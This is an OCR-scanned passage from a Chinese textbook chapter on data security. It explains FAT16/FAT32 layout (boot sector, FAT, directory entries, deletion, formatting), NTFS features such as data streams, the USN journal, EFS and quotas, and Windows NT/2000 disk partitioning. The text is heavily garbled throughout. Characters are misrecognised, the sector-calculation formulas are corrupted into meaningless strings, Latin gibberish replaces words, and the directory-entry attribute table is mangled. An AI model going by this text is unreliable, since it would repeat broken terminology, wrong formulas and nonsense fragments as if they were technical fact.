首先 ,由 簇 导 转换 为 起 始 逻 辑 面 区 ,其 公式 为 : 

起 始 逻辑 扇 区 = ER MDC +142 x f$ FAT HKA + FDT 3 CAI 
十 (起 始 艇 号 一 2) x ARR M X Be 

其 中 ,起 始 复 号 减 2 是 因为 禾 号 从 2 开始; 然后 ,操作 系统 用 起 始 人 逻辑 有 刷 区 除 以 每 个 柱 
面 的 局 区 数 ,得 到 柱 面 号 ; 用 余数 除 以 每 磁道 馈 区 数 得 磁头 号 ,其 余数 就 是 刷 区 号 。 最 后 用 
得 到 的 柱 面 号 、 磁 头号 和 悄 区 号 加 上 本 人 逻辑 分 区 的 起 始 柱 面 号 、 磁 头号 和 局 区 号 ,得 到 
INT13H 所 需 的 各 项 参数 。 

(2) 各 个 区 域 的 相互 关系 。 人 硬盘 局 动 时 首先 由 BIOS EA MBR 的 内 容 , 以 确定 各 个 逻 
辑 驱动 需 及 其 起 始 参数 ,然后 调 人 活动 分 区 的 DBR ,将 控制 权 交 给 DBR, FH DBR 来 引导 系 
统 。 系 统 文件 调 人 后 ,计算 机 就 完全 处 于 操作 系统 的 控制 之 下 ,对 系统 资源 统一 调配 。 此 
外 ,DBR 中 除了 引导 程序 部 分 ,还 有 一 个 很 重要 的 BPB Xe ,操作 系统 依靠 BPB 表 中 记录 的 
一 些 系统 参数 来 确定 FAT、FDT、DATA 区 域 的 位 置 并 且 管 理 文件 系统 。 下 面 表 来 分 析 系 
统 对 这 5 个 区 域 的 划分 与 组 织 。 

首先 ,系统 在 格式 化 时 要 计算 FAT 该 占用 多 少 个 大 区 , 即 给 FAT 2r Be Ib i DC Tc 
为 合理 。 如 图 15-1 所 示 , 总 悄 区 数 已 知 , 保 留 朋 区 数 已 知 ,FDT 占用 届 区 数 已 知 ,由 此 计算 
FAT 的 扇 区 数 和 DATA 的 扇 区 数 。 








图 15-1 计算 分 配给 FAT eK 


很 显然 ,FAT Wii XS DATA Wh KAR KK. AA FAT 占 多 了 ,DATA 就 少 了 ， 
DATA 少 了 ,就 不 需要 那么 大 FAT; 而 FAT 减少 时 ,DATA 就 又 变 大 了 ,DATA 变 大 了 ， 
就 需要 FAT 大 一 点 ,这 样 就 有 一 个 平衡 点 。 平 衡 点 处 的 分 配 , 就 是 最 合理 的 分 配 ( 最 优 原 
则 ) ,由 此 可 列 出 计算 FAT 长 度 的 公式 。 

同 区 总 数 一 保留 肝 区 数 一 FAT Ji KX 2 一 FDT KM oy 


FAT 扇 区 数 = BE es 


但 是 ,在 实用 中 FATI 的 长 度 很 多 时 候 并 不 符合 人 们 讨论 的 最 优 原 则 。 例 如 ,多 次 格 去 
化 ,尤其 是 使 用 不 同 的 格式 化 程序 进行 格式 化 ,以 及 使 用 PQ 及 其 他 软件 进行 过 分 区 容量 幸 
整 ,甚至 系统 对 FATI 长 度 进行 何 化 计算 等 情况 ,部 会 叶 至 FAT 长度 不 付 合 最 优 原 则 ,过 到 
这 种 情况 ,只 需 按 照 实际 大 小 进行 处 理 , 不 影响 使 用 。 
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DBR 中 记录 着 保留 扇 区 FAT 和 FDT, 由 这 些 参 数 就 可 以 确定 各 个 区 的 入 口 。 在 
FDT 中 ,记录 着 根 目录 下 文件 或 子 日 录 的 参数 ， 根据 这 些 参数 ， 可 确定 文件 或 目录 在 DATA 
HAY ET fe A FAT 中 簇 链 的 起 始点 ,然后 由 FAT 中 的 簇 链 来 跟踪 文件 或 子 目 录 在 DATA 
区 中 的 位 置 ,直到 文件 或 目录 结束 ,从 而 找到 整个 文件 或 目录 在 磁盘 上 的 存储 情况 。 其 中 ， 
文件 在 FAT 中 的 登记 既 有 从 前 至 后 ,也 有 从 后 转 至 前 ,以 及 交叉 记录 等 情况 ,这 和 系统 在 
写 人 文件 时 找到 空闲 复 的 顺序 有 关 。 

DATA 区 是 一 个 很 特殊 的 区 域 , 它 只 有 起 始点 和 结束 点 ,区 域 本 身 和 文件 或 目录 却 没有 
任何 关系 。 它 只 是 记录 数据 ,至 于 与 这 些 数 据 之 间 的 关系 ,由 FDT 和 FAT 来 解释 。DATA 区 
HA RA FDT 和 FAT ,所 以 ,FDT 和 FAT 对 DATA 非常 重要 。 如 果 FDT Al FAT PIR 
坏 ,就 无 法 解释 DATA 区 域 中 数据 的 实际 含义 。 如 何 解 释 它 们 , 正 是 文件 系统 的 职责 。 


15.2.2 根 目录 下 文件 的 管理 


FAT16 和 FAT32 的 文件 管理 方式 基本 相同 ,和 郡 是 利用 DBR FDT 和 FAT 配合 实现 文 
件 系 统 的 管理 。FAT16 Al FAT32 文件 目录 项 都 是 32 个 字 节 。 由 于 FAT32 是 FAT16 的 
发 展 ,因此 对 32 个 字 节 的 定义 有 扩充 ,同时 FATI16 的 FEAT 表 用 2 个 字 节 表示 一 个 复 ,而 
FAT32 用 4 个 字 市 表示 一 个 禾 ,这 就 是 FAT16 和 FAT32 之 间 的 异同 。 

根 目录 下 的 所 有 文件 及 其 子 目 录 , 在 根 目 录 的 文件 目录 表 中 都 有 一 个 “目录 登记 项 ”。 
每 个 目录 登记 项 占用 32 个 字 节 ,分 为 8 个 区 域 , 提 供 有 关 文 件 或 子 目录 的 信息 。 

低 版 本 的 DOS 或 Windows 系统 下 ,在 磁盘 中 ,文件 目录 表 的 起 始 逻 辑 忆 区 为 2 FAT 
53 EC 2-1. FDT 所 占用 的 扇 区 数 等 于 32 XC on 目录 允许 的 项 数 /512。 pipi Windows 系 
统 中 对 根 目 录 已 经 没有 限制 ,而 是 把 它 作 为 一 个 普通 的 目录 (或 文件 ) 来 进行 管理 ,由 BPB 指 
示 其 起 始 扇 区 。 表 15-1 所 示 为 FDT 中 OMM 32 FD dent 内 容 及 含义 。 


R 15-1 FDT 中 一 个 文件 登记 项 32 个 字 节 中 各 个 字 节 内 容 及 含义 


F B fu E * ^0 BW 内 容 及 含义 

0~7 用 于 表示 文件 名 称 

8 一 10 用 于 表示 文件 的 扩展 名 
00000000( 读 写 ) 
00000001CH i£) 

" i 00000010 (PAJ) 

00000100 C & Zt) 
00001000 (32 9f 
00100000 (43€ ,只 要 完成 了 写 操作 并 关闭 即 置 D 

un Es 

22~23 表示 文件 的 创建 时 间 

24—25 表示 文件 的 创建 日 期 

26—27 表示 文件 的 首 艇 号 

28—31 表示 文件 的 长 度 


FAT 是 一 个 单 癌 链表 ,文件 的 目录 项 的 第 26.27 TFE PARA VA OY RS 
系统 根据 这 两 个 字 方 中 的 值 来 以 2 得 到 它 在 FAT 中 该 文件 的 单 向 链表 的 首 表 项 ， RAM 
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it FAT 即 可 找到 文件 的 全 部 内 容 。 
15.2.3 子 目录 的 管理 


DOS 中 采用 层次 目录 绪 构 。 根 目录 下 可 以 包含 文件 和 和子 目 录 , 了 于 目录 下 又 可 以 包含 文 
件 或 下 级 子 目 录 。 整 个 目录 结构 好 像 一 棵 倒 过 来 的 树 , 所 以 称 为 树 型 目录 结构 。 

-个 子 目 录 也 占 一 个 文件 目录 项 ,只 不 过 它 的 属性 字 节 为 10H ,文件 长 度 字 节 为 0。 
个 子 目 录 的 内 容 是 若干 个 文件 目录 项 或 下 级 子 目 录 项 。 

当前 目录 为 子 目 录 时 ,使 用 DIR 列 文件 目录 ,通常 可 以 看 到 前 两 项 特殊 文件 。 

“. ”表示 当前 子 目 录 ;“..” 表 示 上 一 级 目录 。 

这 两 项 同 其 他 子 目 录 一 样 也 没有 长 度 。“. ?项 所 报告 的 “ 首 复 号 ?是 子 目 录 本 身 的 起 始 
簇 号 ;“..” 项 所 报告 的 “ 首 簇 号 ”是 上 一 级 目录 的 起 始 艇 号 。 如 果 上 一 级 目录 是 根 目 录 , 则 该 艇 
BIERO. 系统 利用 此 结构 来 实现 目录 之 间 的 双向 联系 ,从 而 把 整个 文件 系统 联系 在 一 起 。 

只 有 当 文 件 需 要 时 ,系统 才 给 文件 分 配 数据 区 空间 。 存 放 数 据 的 空间 按 每 次 一 个 簇 的 
方式 分 配 ,分 配 时 系统 跳 过 已 分 配 的 复 ,第 一 个 遇 到 的 空 得 就 是 下 一 个 将 要 分 配 的 篮 , 此 时 
系统 并 不 考虑 簇 在 磁盘 上 的 物理 位 置 。 同 时 ,文件 删除 后 空 出 来 的 簇 也 可 以 分 配给 新 的 文 
件 , 这 样 做 可 使 用 磁盘 空间 得 到 有 效 的 利用 。 

可 以 说 ,数据 区 空间 的 使 用 是 在 文件 分 配 表 和 文件 目录 表 的 统一 控制 下 完成 的 ,每 个 文 
件 所 有 的 簇 在 文件 分 配 表 中 都 是 链接 在 一 起 的 。 

在 逻辑 驱动 兹 的 根 目 录 下 除 可 以 下 接 建 立 文 件 外 ,还 可 以 建立 下 一 级 目录 , 称 为 根 目 录 
下 的 子 目 录 。 相 应 地 , 根 目 录 了 就 称 为 该 子 目 录 的 父 目录 。 子 目录 和 父 目 录 是 相对 的 ,一 个 父 
目录 可 以 有 多 个 子 目 录 , 但 一 个 子 目录 有 且 只 有 一 个 父 目录 。 在 根 目 录 的 子 上 自 录 下 ,还 可 以 
继续 建立 更 下 一 级 的 子 目录 ,从 而 形成 目录 树 。 

15.2.4 文件 的 删除 

很 多 人 认为 ,在 删除 文件 时 ,系统 会 把 被 删除 文件 的 内 容 全 部 清除 , 即 把 对 应 的 磁盘 上 
的 区 块 全 部 改写 为 0。 实 际 情况 并 非 如 此 ,删除 文件 时 ,文件 系统 只 是 在 该 文件 目录 项 上 做 
一 个 删除 标记 ,但 是 DATA 区 的 簇 仍然 保存 着 被 “删除 ”后 的 文件 。 

对 于 Windows 系统 中 的 回收 站 ,这 只 是 系统 在 便 盘 上 留 出 的 一 片 空间 , Windows 系统 
自动 给 这 片 空 间 建 立 一 个 名 为 “RECYCLED” 的 含有 隐藏 属性 的 文件 夹 (位 于 每 个 硬盘 分 区 
的 根 目 录 下 ), 用 于 存放 暂时 删除 的 文件 ,只 有 将 回收 站 内 的 文件 再 次 删除 或 执行 清空 回收 
站 命令 后 ,这 些 文件 才 会 被 彻底 删除 。 


15.2.5 子 目录 的 删除 


FAT 下 子 目 录 的 人 简单 删除 只 是 对 描述 子 目 录 的 FDT 做 一 个 删除 标志 ,该 子 目 录 下 的 
所 有 文件 和 一 级 子 日 录 的 所 有 记录 都 没有 变动 ,相当 于 该 子 目 录 “ 移 ”到 回收 站 里 。 


15.2.6 分 区 快速 高 级 格 却 化 


融 级 格式 化 对 文件 数据 来 说 通 钊 是 一 种 破坏 性 工作 ,但 它 也 是 个 很 有 歼 的 磁盘 管理 工 
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磁盘 碎片 的 产生 极 大 程度 上 降低 了 磁盘 的 读 写 效率 ,为 了 提 融 磁 盘 宽 源 空间 的 利用 座 ， 
为 了 提高 磁盘 的 谈 写 效率 ,所 以 操作 系统 的 磁盘 酚 片 的 清理 与 整合 程序 应 运 而 生 。 而 最 大 
程度 的 清理 与 整合 磁盘 雁 片 的 方法 就 是 进行 局 级 格式 化 , 它 对 整个 磁盘 进行 清 零工 作 ,使 之 
变 成 一 个 空 盘 ,所 有 族 标 记 成 可 用 族 。 

其 实 快 速 融 级 格式 化 就 是 彻 压 删除 所 有 的 文件 和 子 目录 ,因为 这 样 FDT 和 FAT 中 者 
不 会 再 有 文件 或 目录 记录 ,从 而 释放 出 整个 磁盘 空间 。 

快速 高 级 格 却 化 后 系统 清除 所 有 的 文件 目录 登记 项 ,只 和 留 了 一 个 郑 标 , 连 回收 站 都 清除 
了 ,没有 任何 数据 ,卓然 也 不 存在 删除 的 文件 或 目录 ,回收 站 也 就 没有 存在 的 必要 ,只 在 首次 
侧 单 删除 时 系统 才 会 再 目 动 建立 该 目录 。 

快速 高 级 格式 化 后 , 子 目录 下 的 文件 目录 项 还 你 留 春 。 但 是 由 于 FDT A FAT 中 已 经 
没有 记录 它们 的 入 口 ,因此 对 操作 系统 来 讲 , 它 们 是 不 存在 的 。 所 以 ,如 末 在 格式 化 之 前 没 
有 备份 ,快速 高 级 格式 化 本 号 对 操作 系统 而 言 是 不 可 逆 的 。 同 样 ,快速 高 级 格式 化 后 ,文件 
的 内 容 也 没有 变化 。 


15.2.7 分 区 完全 高 级 格式 化 


Te Fs RAK HA AR A AY FDT 和 FAT 完全 清和 零 。 完 全 格式 化 和 快速 格式 化 一 
样 , 开 没有 更改 于 目录 的 内 容 , 而 且 也 没有 更改 文件 的 内 容 。 

简单 删除 和 彻 奔 删 除 \ 完 全 格式 化 和 快速 格式 化 ,部 不 会 在 DATA KPA, AMA mit 
压 破 坏 数 据 。 其 实 很 好 理解 ,对 于 较 大 的 文件 或 整个 分 区 ,系统 在 处 理 时 ,所 伦 费 的 时 间 比 
复制 文件 时 所 论 费 的 时 间 少 得 多 。 所 以 ,不 可 能 对 那些 区 域 瑟 入 和 擒 。 即 使 是 完全 格式 化 也 
不 一 定安 全 ,这 也 是 能 够 恢复 的 ,尤其 吓 机 密 或 重要 数据 ,为 了 它们 的 安全 ,需要 用 第 三 方 软 
件 进行 彻底 擦 除 , 以 保证 它们 不 被 鳃 取 。 


15.3 NTFS 文件 系统 


15.3.1 NTFS 文件 系统 基础 


相对 于 FAT. NTFS 具有 很 多 FAT 所 不 具有 的 特征 ,主要 有 以 下 几 点 。 

CD 容错 性 : 对 于 磁盘 错误 ,NTEFS 能 够 月 动 修复 而 不 提示 错误 信息 。 在 问 NTFS 分 
区 中 写 文 件 时 ,同时 也 将 该 文件 的 一 份 复制 并 存储 在 内 存 中 ,然后 再 核查 写 人 磁盘 中 的 内 容 
是 否 与 内 存 中 存储 复制 的 内 容 一 致 。 如 果 二 者 不 一 致 ,那么 Windows 就 把 相应 的 而 区 标 为 
坏 朵 区 而 不 再 使 用 它 ,然后 再 利用 内 存 中 存储 的 复制 内 容重 新 问 磁 盘 上 与 文件 。 

(2) 安全 性 : NTFS 可 以 保护 文件 .目录 被 非法 访问 ,如 防止 文件 被 非 授 用 户 访 问 ,或 者 
防止 合法 用 户 的 非法 访问 。 


(3) 使 用 加 密 文件 系统 提高 系统 安全 性 。 作 为 集成 的 系统 服务 ,加 密 文件 系统 具有 以 
下 几 个 优点 。 


CD 透明 的 加 密 过 程 , 不 要 求 用 户 每 次 使 用 时 都 进行 加 解密 。 
D 强大 的 加 蜜 技术。 加 密 文 件 系 统 是 基于 公共 秘 钥 的 加 密 技 术 ,难以 破解 。 
C) 完整 的 数据 恢复 ,加 密 文 件 系统 可 以 保护 剧 时 文件 和 页 面 文件 ,有 利于 完整 的 数据 
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恢复 。 

D 文件 加 密 的 密 钥 存储 在 操作 系统 的 内 核 中 , 极 大 程度 地 保证 了 安全 性 。 

O 文件 压缩 : NTFS 文件 系统 文 持 文件 压缩 功能 。 

© RÀ XR A. 这 个 功能 选项 是 基于 用 户 和 卷 的 ,其 意义 在 于 允许 系统 管理 员 管 理 分 配 
给 各 个 用 户 的 磁盘 空间 ,有 利于 防止 文件 被 非法 用 户 访问 ,防止 文件 被 合法 用 户 的 非法 访 
问 。 磁 盘 限 额 提供 了 一 种 基于 用 户 和 分 区 的 文件 存储 管理 文件 ,使 得 管理 员 可 以 方便 地 利 
用 这 个 工具 合理 地 分 配 存 储 资 源 , 避 人 免 由 于 磁盘 空间 使 用 的 失控 可 能 造成 的 系统 朋 演 ,从 而 
提高 了 系统 的 安全 性 。 


15.3.2 NTFS 文件 系统 的 层次 模型 


文件 系统 的 传统 模型 为 层次 模型 ,该 模型 由 许多 不 同 的 层 组 成 。 每 一 层 都 会 使 用 下 一 
层 的 功能 特性 来 创建 新 的 功能 ,同时 为 上 一 层 提 供 功 能 服务 ,如 图 15-2 所 示 。 

这 是 4 层 的 文件 系统 层次 模型 ,包括 基本 L/O 控制 层 、 基 本 文件 系统 层 、 文 件 组 织 模块 
层 和 逻辑 文件 系统 层 。 

(1) 基本 L/O 控制 层 : 由 设备 驱动 程序 和 中 断 处 理 程序 组 成 ,其 用 途 是 进行 磁盘 和 内 
存 之 间 的 数据 传输 。 

(2) 基本 文件 系统 层 : 其 用 途 就 是 癌 相 应 的 设备 驱动 程序 发 出 读 写 磁盘 物理 块 的 命令 。 

(3) 文件 组 织 模 块 层 : 其 用 途 就 是 负责 对 文件 及 这 些 文件 的 逻辑 块 和 物理 块 进行 操作 。 

(4) 逻辑 文件 系统 层 : 其 用 途 就 是 为 文件 组 织 模块 提供 所 需 的 信息 ,从 而 保证 文件 的 安全 。 

在 Windows 系统 中 ,1/O 管理 需 负 责 处 理 所 有 设备 的 IO 操作 。L/O 管理 硕 通 过 设备 驱 
动 程序 .中间 驱 动 程序 .过滤 驱 动 程序 .文件 系统 驱动 程序 等 完成 L/O 操作 ,如 图 15-3 Brzn , 
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图 15-2 文件 系统 层次 模型 图 15-3 Windows 文件 系统 模型 





第 15 章 ”数据 安全 及 应 隔 


CD 设备 驱动 程序 : 位 于 UO 管理 器 的 最 底层 ,直接 对 设备 进行 L/O 操作 。 

(2) 中 间 驱 动 程序 : 其 用 途 就 是 与 低层 设备 驱动 程序 一 起 ,为 系统 提供 了 功能 增强 。 
例如 , 当 发 现 1/O 失败 时 ,设备 驱动 程序 可 能 简单 地 返回 出 错 信 息 , 但 是 中 间 驱 动 程序 就 会 
回 设备 驱动 程序 发 出 再 试 请 求 。 

(3) 文件 系统 驱动 程序 : 扩展 低层 驱动 程序 的 功能 ,以 实现 特定 的 文件 系统 ,如 NTFS. 

(4) 过 滤 驱 动 程序 : 过 滤 驱 动 程序 所 处 的 位 置 是 多 种 形式 的 。 例 如 , 它 可 以 位 于 中 间 
驱动 程序 与 文件 系统 驱动 程序 之 间 ,也 可 以 位 于 设备 驱动 程序 与 中 间 驱 动 程序 之 间 ,还 可 以 
位 于 文件 系统 驱动 程序 与 1/0 管理 器 API 之 间 。 

其 中 ,FSD 工作 在 内 核 模式 中 ,FSD 与 文件 系统 管理 的 关联 是 最 紧密 的 。 但 是 与 其 他 
标准 内 核 驱动 程序 是 不 同 的 。 首 先 ,FSD m] L/O PAE. ARH SAGES ER 
存 管 理 器 进行 交互 。 因 此 ,FSD 使 用 了 Ntoskml 出 口 函 数 的 超 集 。 虽 然 普通 内 核 设 备 驱 动 
程序 可 以 通过 DDK (Device Driver Kit) 来 创建 ,但 是 文件 系统 驱动 程序 必须 使 用 IFS 
(Installed File System) 来 创建 。 

Windows 的 FSD 可 分 为 本 地 FSD 和 远程 FSD。 前 者 允许 用 户 访 问 本 地 计算 机 上 的 数 
据 ; 而 后 者 允许 用 户 通 过 网 络 访问 远程 计算 机 上 的 数据 。 


15.3.3 NTFS 文件 系统 的 特性 分 析 


为 了 适应 众多 应 用 领域 ,NTFS 不 但 满足 了 其 基本 设计 目标 ,如 可 恢复 性 ,安全 性 和 数 
据 郊 余 与 数据 容错 等 要 求 , 而 且 还 具有 其 他 一 系列 高 级 特性 ,如 多 数据 流 、 基 于 Unicode 的 
名 称 、 通 用 索引 机 制 动态 坏 族 重 映 冉 \ 便 链接 及 软 链接 、 文 件 压缩 ,日 志 记 录 、 人 磁 盘 限额 \ 链 
接 跟 足 、. 加密、 PDSIX 支持 ,碎片 整理 等 。 下 面 简 要 介绍 部 分 高 级 特性 。 

(1) 多 数据 流 。 在 NTFS 中 ,与 文件 相关 的 每 个 信息 单元 包括 文件 名 、 文 件 的 拥有 者 、 
文件 的 时 间 标 记 、 文 件 的 内 容 等 ,都 是 当 作 NTFS 对 象 属性 来 实现 的 。 这 种 统一 实现 便于 
回 文 件 增加 更 多 属性 。 因 为 文件 的 数据 仅仅 是 一 种 属性 且 可 以 增加 更 多 属性 ,所 以 NTFS 
文件 可 以 包含 多 个 数据 流 。 

每 个 数据 流 都 有 其 各 目的 分 配 大 小 (已 预 留 的 磁盘 空间 ) ,实际 大 小 (实际 使 用 了 多 少 字 
节 空 间 ) ,以 及 有 效 的 数据 长 度 ( 初 始 化 了 多 少数 据 流 ) ,等 等 。 男 外 ,每 个 数据 流 都 有 一 个 单 
独 的 文件 锁 , 用 来 锁定 一 定 范 围 的 字 节 并 人 允许 并 发 访问 。 为 了 降低 处 理 开 销 , 每 个 文件 可 共 
享 文件 锁 而 不 是 让 每 个 文件 的 所 有 数据 流 都 使 用 不 同 的 文件 锁 。 

NTFS 文件 有 一 个 默认 数据 流 ,该 数据 流 没 有 名 称 。 应 用 程序 可 以 创建 其 他 的 具有 名 
称 的 数据 流 , 且 可 通过 指定 名 称 来 访问 这 些 数据 流 。 

(2) 完全 支持 Unicode, NTFS 完全 支持 Unicode, 完 全 使 用 Unicode F TEE fr fi X: 
件 、 目 录 和 卷 的 名 称 。Unicode 是 一 种 16 位 的 字符 编码 方案 ,世界 上 每 种 主要 语言 中 的 每 
个 字符 都 能 够 被 唯一 地 表示 ,这 有 助 于 国际 化 。 

(3) RBA). NTFSS 的 一 些 新 功能 建立 在 一 种 称 为 “综合 索引 ”的 基本 功能 之 上 , 综 
全 索引 中 包含 了 具有 某 一 特征 类 型 的 多 个 分 类 项 ,并 使 用 一 种 高 效 存 储 机 制 以 便于 快速 
查找 。 

在 Windows 2000 以 前 的 NTFS 版 本 中 仅 对 文件 名 进行 索引 ,而 NTFS5 实现 了 综合 索 
引 , 这 使 NTFS 能 够 在 索引 中 存放 任意 的 数据 ,而 且 人 允许 对 目录 项 进行 基于 其 他 关键 字 的 
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HEF. Æ NTFS5 中 ,文件 系统 使 用 综合 索引 来 管理 安全 摘 述 符 .配额 信息 . 重 解 析 点 及 文 
件 对 象 标 识 和 从 等。 

(4) 日 志 记 录 。 许 多 类 型 的 应 用 需要 监视 卷 上 文件 或 目录 的 改变 。NTFS 的 做 法 是 : 
应 用 程序 可 以 回转 数 DeviceIOControl 传递 文件 系统 控制 代码 FSCTL CREATE USN 
JOURNAL ,来 配置 NTFS 日 志 记 录 , 这 样 NTFS 将 文件 和 目录 改变 记录 到 一 个 内 部 日 志 
文件 中 。 日 志文 件 足够 大 ,几乎 可 以 保证 应 用 程序 能 有 机 会 来 处 理 记 录 。 应 用 程序 可 以 使 
用 FSCTL CREATE USN JOURNAL 文件 控制 代码 来 读 日 志文 件 ,也 可 以 指定 只 有 新 记 
录 时 DeviceIOControl 才能 完成 。 

(5) RER PRA. WEES BR ALI He Ze SET AP B). RH. BIBLIA Y 5^ Id Bj Hi pP 4r BC 
不 同 的 磁盘 空间 ,而 且 每 一 个 用 户 只 能 访问 有 目 己 的 磁盘 空间 而 不 能 访问 其 他 用 户 的 空间 。 
磁盘 限额 提供 了 一 种 基于 用 户 和 分 区 的 文件 存储 管理 文件 ,使 得 管理 员 可 以 方便 地 利用 这 
个 工具 合理 地 分 配 存储 凌 源 , 避 鲍 由 于 磁盘 空间 使 用 的 失控 可 能 造成 的 系统 关 汗 ,从 而 提高 

(6) 加 密 。 加 密 文 件 系 统 (EFS) 是 NTFS5 的 重要 组 成 部 分 。 它 并 不 是 NTFS5 内 建功 
能 ,而 是 作为 一 个 附加 的 驱动 模块 (\ winnt\system32\driversefs. syo FE., EFS 能 够 提供 
基于 文件 的 透明 加 密 功 能 ,以 便 用 户 保护 敏感 数据 不 会 落 和 人 他 人 之 手 。 

(7) 集中 化 的 安全 信息 。NTFS 系统 始终 文 持 安全 管理 ,这 使 得 管理 员 可 以 指定 哪些 
用 户 可 以 或 不 可 以 存 取 个 别 的 文件 或 目录 。 在 NTFS5 以 前 ,每 个 文件 及 目录 在 月 己 的 安 
全 属性 中 存放 它 的 安全 摘 述 符 。 在 大 多 数 情况 下 ,管理 员 对 整个 目录 树 应 用 相同 的 安全 娘 
置 , 这 样 就 意味 者 这 个 目录 中 所 有 文件 及 子 目 录 使 用 相同 的 安全 设置 而 每 个 目录 项 中 却 存 
在 看 相同 的 副本 。 在 多 用 户 环 境 下 ,安全 描述 和 从 可 能 会 包含 多 个 账号 的 用 户 项 ,如 果 仍 然 在 
文件 日 己 的 安全 属性 中 存放 安全 描述 符 , 就 会 造成 磁盘 存储 空间 利用 率 的 降低 , NTFS5 £F 
对 这 一 点 为 安全 摘 述 和 从 进行 优化 , 它 使 用 一 个 名 称 为 "$3 Secure” 的 独立 文件 来 存放 个 卷 中 
的 安全 描述 符 ,每 个 安全 摘 述 符 只 存在 一 个 实例 。 


15.3.4 Windows NT 4.0 的 磁盘 分 区 


将 一 块 物 理 硬 盘 划 分 为 多 个 能 够 被 格式 化 和 单独 使 用 的 逻辑 单元 , 即 人 磁盘 分 区 ,其 目的 
主要 是 初始 化 便 盘 ,而且 分 隔 不 同 的 操作 系统 ,从 而 使 得 磁盘 可 以 存储 数据 与 保证 多 个 操作 
系统 在 同一 便 盘 上 正常 运行 ; 另外 磁盘 分 区 也 有 利于 数据 的 分 类 存储 。 

在 Windows NT4.0 下 ,不 仅 沿 用 了 以 前 微软 操作 系统 的 单独 分 区 的 概念 ,并 新 设置 了 
特殊 分 区 ,引入 了 卷 集 的 概念 。 其 中 单独 分 区 包括 基本 分 区 和 扩展 分 区 ,而 特殊 分 区 则 包括 
卷 集 .条 市 集 .镜像 和 珊 奇 偶 校 验 的 条 市 集 。 严 格 地 说 ,磁盘 镜像 并 非 一 种 分 区 ,而 是 NT 的 
一 种 容错 方式 ,但 是 由 于 它 是 将 整个 分 区 复制 或 映像 到 为 一 个 物理 磁盘 上 ,因此 也 是 以 分 区 
的 形式 存在 的 。 

(1) 基本 分 区 。 基 本 分 区 是 物理 磁盘 中 可 以 被 标记 为 激活 ,并 且 被 系统 用 来 启动 计算 
BLE HE EET EK. Æ Windows NT4.0 下 ,每 个 物理 磁盘 最 多 可 以 有 4 个 基本 分 区 ,其 主要 日 
的 就 是 为 了 分 隔 不 同 的 操作 系统 ,同时 也 为 了 用 于 存放 不 同类 型 的 数据 。 基 本 分 区 是 不 能 
够 再 划分 子 分 区 的 ,因此 在 基本 分 区 中 ,只 能 分 配 一 个 盘 符 ,没有 逻辑 盘 的 概念 。 

(2) 扩展 分 区 。 默 认 人 情况 下 ,一 个 使 盘 只 能 分 为 4 个 分 区 ,而 扩展 分 区 的 作用 就 是 突破 
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一 个 硬盘 上 只 能 有 4 个 分 区 的 限制 。 而 一 个 硬盘 只 有 一 个 扩展 分 区 , 即 基 本 分 区 以 外 的 空 
间 都 分 配给 扩展 分 区 ,然后 再 在 扩展 分 区 上 划分 逻辑 分 区 ,也 可 以 称 为 逻辑 盘 。 多 个 逻辑 盘 
的 好 处 是 可 以 把 应 用 程序 和 数据 文件 分 类 存放 ,便于 检索 ,如 DD 盘存 放 办 公 软 件 \.E 盘存 放 
游戏 下 盘存 放 音 乐 等 ,这 些 都 和 以 前 的 操作 系统 一 样 。 

(3) 卷 集 。 卷 集 其 实 是 十 分 形象 的 概念 , 它 就 是 把 一 个 或 多 个 物理 硬盘 上 的 2 一 32 个 
未 格式 化 的 自由 空间 组 合成 一 个 逻辑 卷 ,作为 一 个 整体 来 访问 ,并 且 能 够 给 它 分 配 一 个 盘 
FF ,就 像 一 个 单独 的 分 区 一 样 来 格式 化 和 存放 数据 。 在 Windows NT4.0 中 , 卷 集 是 一 种 充 
分 利用 磁盘 空间 的 方法 ,使 用 卷 集 可 以 把 多 个 物理 硬盘 上 较 小 的 日 由 空间 组 合 为 较 大 的 单 
一 逻辑 盘 。 这 样 就 可 以 增加 这 个 逻辑 盘 的 可 用 空间 ,以 便 集中 存放 较 大 的 文件 。 

(4) 条 带 集 合 。 条 带 集 和 卷 集 有 相似 之 处 ,都 是 将 未 格式 化 的 自由 空间 组 合 到 一 个 逻 
辑 驱 动 顺 中 。 但 是 ,它们 也 有 明显 的 区 别 : 卷 集 可 以 在 一 个 单一 的 驱动 器 上 创建 。 而 条 带 
集 至 少 需要 两 块 物理 驱动 硕 ; 卷 集 生 成 的 逻辑 盘存 储 数 据 的 方式 是 连续 存储 的 ,而 条 诗集 
则 是 将 数据 顺序 、 均 勺 地 写 到 所 有 的 物理 盘 中 ,每 次 占用 一 个 物理 盘 的 一 个 单元 格 , 在 
Windows NT4.0 的 条 市 集中 ,每 一 个 单元 格 的 大 小 为 64KB。 

磁盘 条 带 集 是 由 一 个 物理 盘 上 的 若干 个 64KB 的 单元 构成 的 , 当 数 据 写 人 条 带 , 先 将 第 
一 块 硬盘 的 第 一 个 单元 写 满 ,之 后 再 写 第 三 块 硬盘 的 第 一 个 单元 , 当 最 后 一 块 硬盘 的 第 一 个 
单元 写 满 之 后 ,再 回 到 第 一 块 便 盘 的 第 二 个 单元 ,依次 往 下 写 和 人 。 由 于 条 市 集 允 许 并 发 L/O 
操作 ,并 且 可 以 在 所 有 的 驱动 器 上 同时 执行 读 写 , 因 此 ,条 带 集 可 以 提高 系统 的 W/O PERE. 
但 是 ,条 带 集 没 有 数据 元 余 , 因 此 不 具备 任何 容错 功能 。 条 带 集 至 多 可 以 使 用 来 自 32 个 物 
理 盘 的 目 由 空间 ,而 且 可 以 组 合 不 同类 型 的 驱动 需 。 


15.3.5 Windows 2000 后 的 磁盘 分 区 
到 了 Windows 2000 以 后 ,微软 发 展 了 其 特殊 分 区 的 概念 ,提出 了 卷 和 动态 磁盘 的 概 


4. FE Windows 2000 以 后 的 系统 中 ,将 磁盘 分 为 基本 磁盘 和 动态 人 磁盘 ,基本 磁盘 和 以 前 的 
操作 系统 保持 一 致 ,但 使 用 了 卷 的 概念 。 

一 块 物 理 便 盘 初 始 和 被 默认 为 基本 磁盘 ,基本 磁盘 也 就 是 平和 并 在 Windows 上 使 用 的 包含 
主 分 区 、 扩 展 分 区 和 人 逻 辑 驱 动 絮 的 人 磁盘 类 型 。 而 动态 磁盘 则 是 Windows NT 下 的 特殊 分 区 
的 发 展 ,只 能 被 包含 Windows 2000 以 后 的 操作 系统 所 文 持 。 动 态 磁盘 提供 了 基本 磁盘 不 
具备 的 一 些 特性 ,如 创建 可 跨越 多 个 磁盘 的 卷 和 创建 具有 容错 能 力 的 卷 的 能 力 。 所 有 动态 
